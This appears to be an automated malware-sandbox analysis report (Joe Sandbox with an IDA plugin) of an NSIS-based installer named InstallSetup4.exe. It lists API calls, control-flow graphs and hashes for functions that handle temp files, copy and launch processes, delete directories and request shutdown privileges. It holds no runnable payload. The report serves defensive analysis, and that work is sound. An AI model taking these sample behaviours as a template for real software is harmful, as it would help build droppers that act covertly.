21 API calls 4165->4166 4167 40191b 4166->4167 4168 405bb7 MessageBoxIndirectW 4167->4168 4169 401924 4168->4169 4170 404695 4171 4047c7 4170->4171 4172 4046ad 4170->4172 4173 404831 4171->4173 4176 4048fb 4171->4176 4179 404802 GetDlgItem SendMessageW 4171->4179 4175 4044d6 22 API calls 4172->4175 4174 40483b GetDlgItem 4173->4174 4173->4176 4177 404855 4174->4177 4178 4048bc 4174->4178 4180 404714 4175->4180 4181 40453d 8 API calls 4176->4181 4177->4178 4185 40487b SendMessageW 
LoadCursorW SetCursor 4177->4185 4178->4176 4186 4048ce 4178->4186 4203 4044f8 EnableWindow 4179->4203 4183 4044d6 22 API calls 4180->4183 4184 4048f6 4181->4184 4188 404721 CheckDlgButton 4183->4188 4204 404944 4185->4204 4190 4048e4 4186->4190 4191 4048d4 SendMessageW 4186->4191 4187 40482c 4193 404920 SendMessageW 4187->4193 4201 4044f8 EnableWindow 4188->4201 4190->4184 4192 4048ea SendMessageW 4190->4192 4191->4190 4192->4184 4193->4173 4196 40473f GetDlgItem 4202 40450b SendMessageW 4196->4202 4198 404755 SendMessageW 4199 404772 GetSysColor 4198->4199 4200 40477b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4198->4200 4199->4200 4200->4184 4201->4196 4202->4198 4203->4187 4207 405b7d ShellExecuteExW 4204->4207 4206 4048aa LoadCursorW SetCursor 4206->4178 4207->4206 4208 402896 4209 40289d 4208->4209 4210 402bae 4208->4210 4211 402d89 21 API calls 4209->4211 4212 4028a4 4211->4212 4213 4028b3 SetFilePointer 4212->4213 4213->4210 4214 4028c3 4213->4214 4216 40649e wsprintfW 4214->4216 4216->4210 4217 401f17 4218 402dab 21 API calls 4217->4218 4219 401f1d 4218->4219 4220 402dab 21 API calls 4219->4220 4221 401f26 4220->4221 4222 402dab 21 API calls 4221->4222 4223 401f2f 4222->4223 4224 402dab 21 API calls 4223->4224 4225 401f38 4224->4225 4226 401423 28 API calls 4225->4226 4227 401f3f 4226->4227 4234 405b7d ShellExecuteExW 4227->4234 4229 401f87 4230 402933 4229->4230 4231 4069f6 5 API calls 4229->4231 4232 401fa4 CloseHandle 4231->4232 4232->4230 4234->4229 4235 402f98 4236 402faa SetTimer 4235->4236 4238 402fc3 4235->4238 4236->4238 4237 403018 4238->4237 4239 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4238->4239 4239->4237 4240 40571b 4241 4058c5 4240->4241 4242 40573c GetDlgItem GetDlgItem GetDlgItem 4240->4242 4244 4058f6 4241->4244 4245 4058ce GetDlgItem CreateThread CloseHandle 4241->4245 4285 40450b SendMessageW 4242->4285 4247 405921 4244->4247 4248 405946 4244->4248 4249 40590d ShowWindow ShowWindow 4244->4249 4245->4244 
4246 4057ac 4252 4057b3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4246->4252 4250 405981 4247->4250 4254 405935 4247->4254 4255 40595b ShowWindow 4247->4255 4251 40453d 8 API calls 4248->4251 4287 40450b SendMessageW 4249->4287 4250->4248 4262 40598f SendMessageW 4250->4262 4257 405954 4251->4257 4260 405821 4252->4260 4261 405805 SendMessageW SendMessageW 4252->4261 4256 4044af SendMessageW 4254->4256 4258 40597b 4255->4258 4259 40596d 4255->4259 4256->4248 4264 4044af SendMessageW 4258->4264 4263 4055dc 28 API calls 4259->4263 4265 405834 4260->4265 4266 405826 SendMessageW 4260->4266 4261->4260 4262->4257 4267 4059a8 CreatePopupMenu 4262->4267 4263->4258 4264->4250 4269 4044d6 22 API calls 4265->4269 4266->4265 4268 406594 21 API calls 4267->4268 4270 4059b8 AppendMenuW 4268->4270 4271 405844 4269->4271 4274 4059d5 GetWindowRect 4270->4274 4275 4059e8 TrackPopupMenu 4270->4275 4272 405881 GetDlgItem SendMessageW 4271->4272 4273 40584d ShowWindow 4271->4273 4272->4257 4279 4058a8 SendMessageW SendMessageW 4272->4279 4276 405870 4273->4276 4277 405863 ShowWindow 4273->4277 4274->4275 4275->4257 4278 405a03 4275->4278 4286 40450b SendMessageW 4276->4286 4277->4276 4280 405a1f SendMessageW 4278->4280 4279->4257 4280->4280 4281 405a3c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4280->4281 4283 405a61 SendMessageW 4281->4283 4283->4283 4284 405a8a GlobalUnlock SetClipboardData CloseClipboard 4283->4284 4284->4257 4285->4246 4286->4272 4287->4247 4288 401d1c 4289 402d89 21 API calls 4288->4289 4290 401d22 IsWindow 4289->4290 4291 401a25 4290->4291 4292 404d1d 4293 404d49 4292->4293 4294 404d2d 4292->4294 4295 404d7c 4293->4295 4296 404d4f SHGetPathFromIDListW 4293->4296 4303 405b9b GetDlgItemTextW 4294->4303 4298 404d5f 4296->4298 4302 404d66 SendMessageW 4296->4302 4300 40140b 2 API calls 4298->4300 4299 404d3a SendMessageW 4299->4293 4300->4302 4302->4295 4303->4299 4304 40149e 4305 4023a2 4304->4305 4306 4014ac PostQuitMessage 4304->4306 
4306->4305 4307 401ba0 4308 401bf1 4307->4308 4309 401bad 4307->4309 4311 401bf6 4308->4311 4312 401c1b GlobalAlloc 4308->4312 4310 401c36 4309->4310 4316 401bc4 4309->4316 4313 406594 21 API calls 4310->4313 4325 4023a2 4310->4325 4311->4325 4328 406557 lstrcpynW 4311->4328 4314 406594 21 API calls 4312->4314 4315 40239c 4313->4315 4314->4310 4321 405bb7 MessageBoxIndirectW 4315->4321 4326 406557 lstrcpynW 4316->4326 4319 401c08 GlobalFree 4319->4325 4320 401bd3 4327 406557 lstrcpynW 4320->4327 4321->4325 4323 401be2 4329 406557 lstrcpynW 4323->4329 4326->4320 4327->4323 4328->4319 4329->4325 4330 402621 4331 402dab 21 API calls 4330->4331 4332 402628 4331->4332 4335 406047 GetFileAttributesW CreateFileW 4332->4335 4334 402634 4335->4334 3405 4025a3 3416 402deb 3405->3416 3409 4025b6 3410 4025d2 RegEnumKeyW 3409->3410 3411 4025de RegEnumValueW 3409->3411 3412 402933 3409->3412 3413 4025fa RegCloseKey 3410->3413 3411->3413 3414 4025f3 3411->3414 3413->3412 3414->3413 3417 402dab 21 API calls 3416->3417 3418 402e02 3417->3418 3419 4063c4 RegOpenKeyExW 3418->3419 3420 4025ad 3419->3420 3421 402d89 3420->3421 3422 406594 21 API calls 3421->3422 3423 402d9e 3422->3423 3423->3409 4336 4015a8 4337 402dab 21 API calls 4336->4337 4338 4015af SetFileAttributesW 4337->4338 4339 4015c1 4338->4339 3498 401fa9 3499 402dab 21 API calls 3498->3499 3500 401faf 3499->3500 3501 4055dc 28 API calls 3500->3501 3502 401fb9 3501->3502 3503 405b3a 2 API calls 3502->3503 3504 401fbf 3503->3504 3505 401fe2 CloseHandle 3504->3505 3509 402933 3504->3509 3513 4069f6 WaitForSingleObject 3504->3513 3505->3509 3508 401fd4 3510 401fe4 3508->3510 3511 401fd9 3508->3511 3510->3505 3518 40649e wsprintfW 3511->3518 3514 406a10 3513->3514 3515 406a22 GetExitCodeProcess 3514->3515 3516 406987 2 API calls 3514->3516 3515->3508 3517 406a17 WaitForSingleObject 3516->3517 3517->3514 3518->3505 4340 40202f 4341 402dab 21 API calls 4340->4341 4342 402036 4341->4342 4343 40694b 5 API calls 4342->4343 4344 
Execution graph (rendered by the interactive viewer; the raw node and edge numbering is not reproduced here). Nodes are function addresses labelled with the APIs they call. Labels recoverable from the graph, grouped by the function they belong to:
- 403532 (entry): SetErrorMode, GetVersionExW (403532, 403586); lstrlenA (40362b); #17, OleInitialize, SHGetFileInfoW (403655); GetCommandLineW (4036a4); CharNextW (4036dc, 405e53); GetTempPathW (403804, 403840); GetWindowsDirectoryW, lstrcatW (403820); SetEnvironmentVariableW x2 (403840); DeleteFileW (403876); GetTickCount, GetModuleFileNameW (403082); wsprintfW (4039a7); GetFileAttributesW (4039e3); DeleteFileW (4039ef); SetCurrentDirectoryW (403a1d); CopyFileW (403a2c); CreateProcessW, CloseHandle (405b3a); CreateDirectoryW (405aab, 405b05); FindFirstFileW, FindClose (4068b4); CloseHandle (403aa5); ExitProcess, OleUninitialize (403a7d); MessageBoxIndirectW (405be0); GetCurrentProcess, OpenProcessToken (403abb); LookupPrivilegeValueW, AdjustTokenPrivileges (403ad3); ExitWindowsEx (403b23); ExitProcess (403b37).
- 403c29 (window and dialog setup): GetUserDefaultUILanguage (403c43); lstrcatW (403ca4); lstrlenW, lstrcmpiW, GetFileAttributesW (403d29, 403d37, 403d47); LoadImageW (403d80); RegisterClassW (403da7); SystemParametersInfoW, CreateWindowExW (403ddd); ShowWindow (403e49); GetClassInfoW, RegisterClassW (403e6f, 403e83); DialogBoxParamW (403e99); OleInitialize, OleUninitialize (4056af, 40570b); SetWindowTextW, SendMessageW (405642, 405655); CreateDialogParamW, ShowWindow, DestroyWindow (40305d, 403030); PeekMessageW, DispatchMessageW (4069a4, 40699a).
- 405c63 (directory walker): DeleteFileW (405c8b); lstrcatW (405cce, 405cf1); lstrlenW, FindFirstFileW (405cfc); FindNextFileW (405da5); FindClose (405dbb); via 405c1b: GetFileAttributesW (406022), SetFileAttributesW (406034, 405c54), RemoveDirectoryW (405c36), DeleteFileW (405c3e).
- 406317 (MoveFileExW and its fallback): MoveFileExW (406317); GetShortPathNameW (4061d7, 4061f3); wsprintfA (406210); GetFileAttributesW, CreateFileW (406047); GetFileSize, GlobalAlloc (406254); ReadFile (4060ca); lstrlenA, lstrcmpiA, CharNextA (405fac, 405fc6, 405fe4); lstrcpyA (406295); SetFilePointer (4062ee); WriteFile (4060f9); GlobalFree (406304); CloseHandle (40630b).
- Other functions: GlobalAlloc (402061); wsprintfW (40649e); RegQueryValueExW, RegCloseKey (40254d, 402573); CoCreateInstance (40221d); ExpandEnvironmentStringsW, lstrcmpW (401a3e, 401a57); WritePrivateProfileStringW (4023ea); RegDeleteValueW, RegCloseKey (402459); RegOpenKeyExW (4063c4); RegEnumValueW (402eec); RegEnumKeyW (402f4b); RegCloseKey (402f54, 402f76); RegDeleteKeyW (402f68); SearchPathW (401741); GetDlgItem (401d50); ReadFile, WriteFile, SetFilePointer (4034d4, 4060f9, 4034ea); MulDiv, wsprintfW (4033e7).

Control-flow Graph

Basic-block graph for the function at 403532-403b49 (rendered by the interactive viewer; the executed/not-executed colouring and the raw edge list are not reproduced). Blocks that call APIs or subroutines, in address order: 403532-403584 SetErrorMode, GetVersionExW; 403586-4035b6 GetVersionExW; 40360f-403617 call 40694b; 403625-403639 call 4068db, lstrlenA; 40363b-403657 call 40694b x3; 403668-4036cc #17, OleInitialize, SHGetFileInfoW, call 406557, GetCommandLineW, call 406557; 4036d5-4036e9 call 405e53, CharNextW; 4037d1-4037e0 call 405e53; 4037f2-4037ff call 406557; 403804-40381e GetTempPathW, call 403501; 403820-40383e GetWindowsDirectoryW, lstrcatW, call 403501; 403840-403870 GetTempPathW, lstrcatW, SetEnvironmentVariableW x2, call 403501; 403876-403890 DeleteFileW, call 403082; 4038a2-4038ad call 405e53; 403907-403915 call 405f2e; 40391b-403931 call 406557 x2; 403935-40393c call 403c29; 40394a-403970 call 405b22, lstrlenW, call 406557; 403972-40397c call 406557; 4039a7-4039d1 wsprintfW, call 406594 (the ~nsu%X.tmp name loop, re-entered from 403a0e-403a19); 4039d3-4039d8 call 405aab; 4039da call 405b05; 4039e3-4039ed GetFileAttributesW; 4039ef-4039f8 DeleteFileW; 4039fa-403a0c call 405c63; 403a1d-403a3c SetCurrentDirectoryW, call 406317, CopyFileW; 403a3e-403a5f call 406317, call 406594, call 405b3a; 403a6d-403a75 call 4068b4; 403a7d-403a8d ExitProcess, OleUninitialize; 403a8f-403a9f call 405bb7, ExitProcess; 403aa5-403ab1 CloseHandle; 403abb-403ad1 GetCurrentProcess, OpenProcessToken; 403ad3-403b01 LookupPrivilegeValueW, AdjustTokenPrivileges; 403b07-403b15 call 40694b; 403b23-403b2e ExitWindowsEx; 403b30-403b32 call 40140b; 403b45-403b49 ExitProcess.
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32 ref: 00403555
                                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
                                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
                                                                                            • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
                                                                                            • OleInitialize.OLE32(00000000), ref: 00403670
                                                                                            • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
                                                                                            • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
                                                                                            • CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036DD
                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403832
                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040384E
                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
                                                                                            • DeleteFileW.KERNEL32(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954
                                                                                              • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                            • wsprintfW.USER32 ref: 004039B1
                                                                                            • GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 004039E4
                                                                                            • DeleteFileW.KERNEL32(00437800), ref: 004039F0
                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E
                                                                                              • Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                                                                            • CopyFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34
                                                                                              • Part of subcall function 00405B3A: CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                                              • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                                                              • Part of subcall function 004068B4: FindFirstFileW.KERNEL32(76F93420,0042FAB8,C:\,00405F77,C:\,C:\,00000000,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76F93420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                              • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                            • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A7D
                                                                                            • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
                                                                                            • ExitProcess.KERNEL32 ref: 00403A9F
                                                                                            • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
                                                                                            • ExitProcess.KERNEL32 ref: 00403B49
                                                                                              • Part of subcall function 00405B05: CreateDirectoryW.KERNEL32(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                            • String ID: 1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\InstallSetup4.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                            • API String ID: 2017177436-3803441485
                                                                                            • Opcode ID: e969c2e22f73361fc79175c4bfa344e76f400cd5c8ceb61292dbf8b91988ccbf
                                                                                            • Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
                                                                                            • Opcode Fuzzy Hash: e969c2e22f73361fc79175c4bfa344e76f400cd5c8ceb61292dbf8b91988ccbf
                                                                                            • Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

Control-flow Graph

Basic-block graph for the function at 405c63-405e23 (rendered by the interactive viewer; the executed/not-executed colouring and the raw edge list are not reproduced). Blocks that call APIs or subroutines, in address order: 405c63-405c89 call 405f2e; 405c8b-405c9d DeleteFileW; 405cbc-405ccc call 406557; 405cce-405cd9 lstrcatW (appends \*.*); 405cdb-405cdc call 405e72; 405cf1-405cf7 lstrcatW; 405cfc-405d18 lstrlenW, FindFirstFileW; 405d46-405d5a call 406557; 405d66-405d6f call 405c63 (recursive call); 405d71-405d7c call 405c1b; 405d83-405d93 call 4055dc, call 406317; 405d9d-405da0 call 4055dc; 405da5-405db5 FindNextFileW (loops back to 405d1e); 405dbb-405dbc FindClose; 405de1-405de9 call 4068b4; 405deb-405dff call 405e26, call 405c1b; 405e06-405e15 call 4055dc, call 406317; 405e17-405e1a call 4055dc.
                                                                                            APIs
                                                                                            • DeleteFileW.KERNEL32(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405C8C
                                                                                            • lstrcatW.KERNEL32(0042EA70,\*.*), ref: 00405CD4
                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405CF7
                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,76F93420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CFD
                                                                                            • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,76F93420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405D0D
                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
                                                                                            • FindClose.KERNEL32(00000000), ref: 00405DBC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                                                                            • API String ID: 2035342205-3503601887
                                                                                            • Opcode ID: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
                                                                                            • Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
                                                                                            • Opcode Fuzzy Hash: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
                                                                                            • Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 588 4068b4-4068c8 FindFirstFileW 589 4068d5 588->589 590 4068ca-4068d3 FindClose 588->590 591 4068d7-4068d8 589->591 590->591
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(76F93420,0042FAB8,C:\,00405F77,C:\,C:\,00000000,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76F93420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                            • FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileFirst
                                                                                            • String ID: C:\
                                                                                            • API String ID: 2295610775-3404278061
                                                                                            • Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                                                            • Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
                                                                                            • Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                                                            • Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 149 403c29-403c41 call 40694b 152 403c43-403c4e GetUserDefaultUILanguage call 40649e 149->152 153 403c55-403c8c call 406425 149->153 157 403c53 152->157 158 403ca4-403caa lstrcatW 153->158 159 403c8e-403c9f call 406425 153->159 160 403caf-403cd8 call 403eff call 405f2e 157->160 158->160 159->158 166 403d6a-403d72 call 405f2e 160->166 167 403cde-403ce3 160->167 173 403d80-403da5 LoadImageW 166->173 174 403d74-403d7b call 406594 166->174 167->166 168 403ce9-403d11 call 406425 167->168 168->166 178 403d13-403d17 168->178 176 403e26-403e2e call 40140b 173->176 177 403da7-403dd7 RegisterClassW 173->177 174->173 191 403e30-403e33 176->191 192 403e38-403e43 call 403eff 176->192 179 403ef5 177->179 180 403ddd-403e21 SystemParametersInfoW CreateWindowExW 177->180 182 403d29-403d35 lstrlenW 178->182 183 403d19-403d26 call 405e53 178->183 185 403ef7-403efe 179->185 180->176 186 403d37-403d45 lstrcmpiW 182->186 187 403d5d-403d65 call 405e26 call 406557 182->187 183->182 186->187 190 403d47-403d51 GetFileAttributesW 186->190 187->166 194 403d53-403d55 190->194 195 403d57-403d58 call 405e72 190->195 191->185 201 403e49-403e63 ShowWindow call 4068db 192->201 202 403ecc-403ed4 call 4056af 192->202 194->187 194->195 195->187 209 403e65-403e6a call 4068db 201->209 210 403e6f-403e81 GetClassInfoW 201->210 207 403ed6-403edc 202->207 208 403eee-403ef0 call 40140b 202->208 207->191 213 403ee2-403ee9 call 40140b 207->213 208->179 209->210 211 403e83-403e93 GetClassInfoW RegisterClassW 210->211 212 403e99-403eca DialogBoxParamW call 40140b call 403b79 210->212 211->212 212->185 213->191
                                                                                            APIs
                                                                                              • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                              • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                            • GetUserDefaultUILanguage.KERNEL32(00000002,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,0043F000,00008001), ref: 00403C43
                                                                                              • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                            • lstrcatW.KERNEL32(1033,0042CA68), ref: 00403CAA
                                                                                            • lstrlenW.KERNEL32(004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,76F93420), ref: 00403D2A
                                                                                            • lstrcmpiW.KERNEL32(00432698,.exe,004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
                                                                                            • GetFileAttributesW.KERNEL32(004326A0), ref: 00403D48
                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403D91
                                                                                            • RegisterClassW.USER32(004336A0), ref: 00403DCE
                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403E51
                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
                                                                                            • RegisterClassW.USER32(004336A0), ref: 00403E93
                                                                                            • DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
